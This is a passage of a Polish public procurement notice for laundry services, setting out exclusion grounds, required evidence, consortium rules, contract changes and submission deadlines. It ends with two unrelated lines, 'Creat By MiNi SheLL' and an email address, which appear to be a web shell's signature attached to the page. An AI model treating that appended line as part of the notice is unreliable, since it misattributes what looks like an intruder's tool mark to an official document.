Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących<br/>podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia Wykonawcy:<br/>2.1. W zakresie potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania zamawiający zażąda:<br/>2.1.1. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp;<br/>Ogłoszenie nr 2023/BZP 00044229/01 z dnia 2023-01-19<br/>2023-01-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Zgodnie z treścią art. 274 ust. 4 ustawy Pzp Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych,<br/>jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych<br/>w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. W związku z<br/>powyższym, jeżeli Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki<br/>cywilne – wskaże w oświadczeniu załącznik Nr 2/2a do SWZ bazy, z których Zamawiający bezpłatnie może pozyskać określone<br/>dokumenty potwierdzające sytuację podmiotową Wykonawcy – to Zamawiający nie będzie wzywał Wykonawcy do ich złożenia.<br/>2.1.2. oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007<br/>r. o ochronie konkurencji i konsumentów (Dz.U. 2021 poz. 275), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp Wzór oświadczenia stanowi załącznik nr 3<br/>do SWZ.<br/>2.1.3. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/> art. 108 ust. 1 pkt 3 ustawy,<br/> art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/> art. 108 ust. 1 pkt 6 ustawy,<br/> art. 7 ust. 1 ustawy z dnia 13 kwietnia o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (poz. 835).<br/>Wzór oświadczenia stanowi załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych, potwierdzających, że Wykonawca posiada wdrożoną normę jakościową, w szczególności ISO 9001:2015 w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot zamówienia (tj. usługi pralnicze) w postaci:<br/>	zaświadczenia niezależnego podmiotu zajmującego się poświadczeniem zgodności działań Wykonawcy z normami jakościowymi, w szczególności certyfikaty systemów zarządzania ISO 9001:2015 w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot zamówienia (tj. usługi pralnicze).<br/><br/><br/>UWAGA!!!!<br/>Na podstawie art. 107 ust. 1 ustawy Pzp - przedmiotowe środki dowodowe<br/>Wykonawcy zobowiązani są złożyć wraz z ofertą!!!!<br/><br/>Na podstawie art. 107 ust. 2 ustawy Pzp - jeżeli wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/><br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/><br/>Oferta wykonawcy, który nie złożył lub nie uzupełnił na wezwanie przedmiotowych środków dowodowych lub złożone na wezwanie przedmiotowe środki dowodowe będą nadal niekompletne – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 c) ustawy Prawo zamówień publicznych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Na podstawie art. 107 ust. 2 ustawy Pzp - jeżeli wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/><br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/><br/>Oferta wykonawcy, który nie złożył lub nie uzupełnił na wezwanie przedmiotowych środków dowodowych lub złożone na wezwanie przedmiotowe środki dowodowe będą nadal niekompletne – zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 c) ustawy Prawo zamówień publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) Wykonawcy wspólnie ubiegający się o zamówienie (Konsorcjum/ wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy<br/>Pzp:<br/>a) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia i wniesienie<br/>zabezpieczenia należytego wykonania umowy;<br/>b) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia a<br/>c) pełnomocnictwo powinno jednoznacznie wskazywać jakiego postępowania dotyczy, Wykonawców wspólnie ubiegających<br/>się o zamówienia, dane pełnomocnika, czynności jakie w postępowaniu ma prawo wykonywać pełnomocnik;<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie dotyczące braku podstaw do<br/>wykluczenia oraz oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu składa odrębnie każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie stanowiące załącznik nr 4<br/>do SWZ, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>5) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>6) Wymagania dotyczące wykonawcy stosuje się odpowiednio do wykonawców, wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>7) Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.<br/>8) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego żaden z nich nie może<br/>podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 2, 3, 4 ustawy Pzp, natomiast spełnianie<br/>warunków udziału w postępowaniu wykazują zgodnie z pkt. 10).<br/>9) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku<br/>przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców (na wezwanie Zamawiającego).<br/>10) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć dokumenty i oświadczenia, potwierdzające spełnianie warunków udziału w postępowaniu, przy czym<br/>dokumenty te składa odpowiednio. Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na<br/>zasadach opisanych w niniejszej SWZ.<br/>11) Dokumenty i oświadczenia potwierdzające brak podstaw wykluczenia składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>12) Na podstawie art. 226 ust. 1 pkt 2 ustawy Pzp Zamawiający odrzuci ofertę Wykonawcy:<br/>a) podlegającego wykluczeniu z postępowania lub<br/>b) niespełniającego warunków udziału w postępowaniu, lub<br/>c) który nie złożył w przewidzianym terminie oświadczenia, o którym mowa wart.125 ust.1 ustawy Pzp, lub podmiotowego<br/>środka dowodowego, potwierdzających brak podstaw wykluczenia lub spełnianie warunków <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>1. Przyszłe zobowiązania wykonawcy związane z umową i jej realizacją są określone przepisami ustawy z dnia 11 września<br/>2019r Prawo zamówień publicznych (t.j. Dz.U.2022.1710) oraz przepisami Kodeksu Cywilnego.<br/>2. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy<br/>stanowią załącznik nr 6 do SWZ.<br/>3. Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z<br/>treści niniejszej SWZ, danych zawartych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego,<br/>które zostaną wprowadzone do treści tej umowy, o których mowa w pkt. 2.<br/>4. Zamawiający wymaga, aby wybrany w danym zadaniu wykonawca zawarł z nim umowę na warunkach określonych w<br/>projektowanych postanowieniach umowy.<br/>5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów w przypadkach i na warunkach<br/>określonych w §11 projektowanych postanowień umowy (stanowiących załącznik Nr 6 do SWZ).<br/>6. W przypadku okoliczności wymienionych w art. 456 ustawy Pzp Zamawiający może odstąpić od umowy w terminie 30 dni<br/>od powzięcia wiadomości o wskazanych okolicznościach.<br/>1. Zamawiający przewiduje możliwość wprowadzenia zmian w umowie w przypadkach określonych w art. 454 ust. 1-2 pzp<br/><br/><br/>2. Zmiany umowy wymagają zgodnej woli stron oraz zachowania formy pisemnej<br/>w postaci aneksu pod rygorem nieważności.<br/>3. Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w<br/>przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej<br/>pełnienie powierzonych jej obowiązków.<br/>4. W związku ze zmianami organizacyjnymi i przekształceniami zachodzącymi<br/>w resorcie Obrony Narodowej, Wykonawca wyraża zgodę na dokonanie przez Zamawiającego cesji całokształtu praw i<br/>obowiązków wynikających z niniejszej umowy na jednostkę wojskową, która będzie następcą prawnym Zamawiającego,<br/>bądź też przejmie jego zobowiązania lub uprawnienia.<br/>5. Strony dopuszczają dokonanie zmiany umowy, gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub<br/>nowelizacji przepisów) lub z innych przyczyn o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę<br/>wymogów lub konieczne będzie spełnienie wymogów dodatkowych.<br/>6. Wartość umowy może ulec zmianie w przypadku zmiany ustawowej stawki podatku VAT w stosunku do towarów, których<br/>zmiana dotyczy, w zakresie wynikającym z tej zmiany.<br/>7. Zgodnie z art. 439 ust. 1 ustawy Pzp, Strony wprowadzają zasady zmian wysokości wynagrodzenia należnego<br/>wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>8. Zmiana wysokości wynagrodzenia w przypadku, o którym mowa w ust. 7 będzie obejmować wyłącznie część<br/>wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania umowy<br/>przez Wykonawcę w związku ze zmianą ceny materiałów i kosztów związanych z realizacją umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w rozdziale XII pkt. 2 i 3 należy złożyć za pośrednictwem platformy pod adresem SMART PZP pod adresem: https://portal.smartpzp.pl/41blsz/module/lista_zadan, na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-01 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie podstawowym, w wariancie, o którym<br/>mowa w art. 275 pkt 1 ustawy z dnia 11 września 2019 r. (t.j. Dz. U. z 2022, poz. 1710 ze zm.) Prawo zamówień<br/>publicznych, zgodnie z wymogami określonymi w niniejszej Specyfikacji Warunków Zamówienia, zwanej dalej „SWZ”.<br/>2. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji.<br/>3. Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 11 września 2019r. – Prawo zamówień<br/>publicznych, zwanej dalej „ustawą”, a w sprawach nieuregulowanych ustawą, przepisy ustawy – Kodeks cywilny z dnia<br/>23.04.1964 r. (Dz. U. z 2022 r. poz. 1360 z późn. zm.).<br/>4. Do niniejszego postępowania mają zastosowanie przepisy określone w Rozporządzeniu Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie.<br/>5. Dokumentacja prowadzonego postępowania oraz wszelkie zmiany i wyjaśnienia treści SWZ dostępne będą na stronie<br/>prowadzonego postępowania pod adresem: https://portal.smartpzp.pl/41blsz , zwanej dalej „Platformą&#34;<br/>Oferty wariantowe<br/>Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<br/>Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych<br/>do oferty;<br/>Umowa ramowa<br/>Zamawiający nie przewiduje zawarcia umowy ramowej;<br/>Aukcja elektroniczna<br/>Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;<br/>Zamówienia, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp<br/>Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy usług, o których mowa w art. 214 ust. 1<br/>pkt 8 ustawy Pzp, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego.<br/>Ogłoszenie nr 2023/BZP 00044229/01 z dnia 2023-01-19<br/>2023-01-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Rozliczenia w walutach obcych<br/>Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>Zwrot kosztów udziału w postępowaniu<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>Zaliczki na poczet udzielenia zamówienia<br/>Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>Unieważnienie postępowania<br/>Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 oraz 256<br/>ustawy Pzp.<br/>Rozliczenia między Zamawiającym, a Wykonawcą.<br/>Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich (PLN).<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (zwanej<br/>dalej: Platformą) pod adresem: https://portal.smartpzp.pl/41blsz (strona dotycząca tego postępowania)<br/>Zamawiający nie dokonuje podziału zamówienia na części.<br/>Prawo opcji<br/>Zgodnie z art. 441 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych Zamawiający przewiduje<br/>możliwość skorzystania z prawa opcji polegającego na możliwości zwiększenia podstawowego zakresu ilościowego<br/>przedmiotu zamówienia określonego co do asortymentu i ilości w tabeli Nr 1 – kolumna „zakres podstawowy”<br/>(gwarantowany Wykonawcy), maksymalnie o ilości wykazane w tabeli Nr 1 kolumna „ZAKRES PRAWA OPCJI” (do 80%<br/>ilości w ramach zamówienia podstawowego).<br/>Wymóg zatrudnienia na podstawie umowy o stosunku pracy:<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób dokonujących<br/>czynności prania wodnego i chemicznego objęte przedmiotem zamówienia - wykonanie tych czynności polega na<br/>wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz.U. z 2020 r. poz.<br/>1320 j.t.).

Creat By MiNi SheLL
Email: jattceo@gmail.com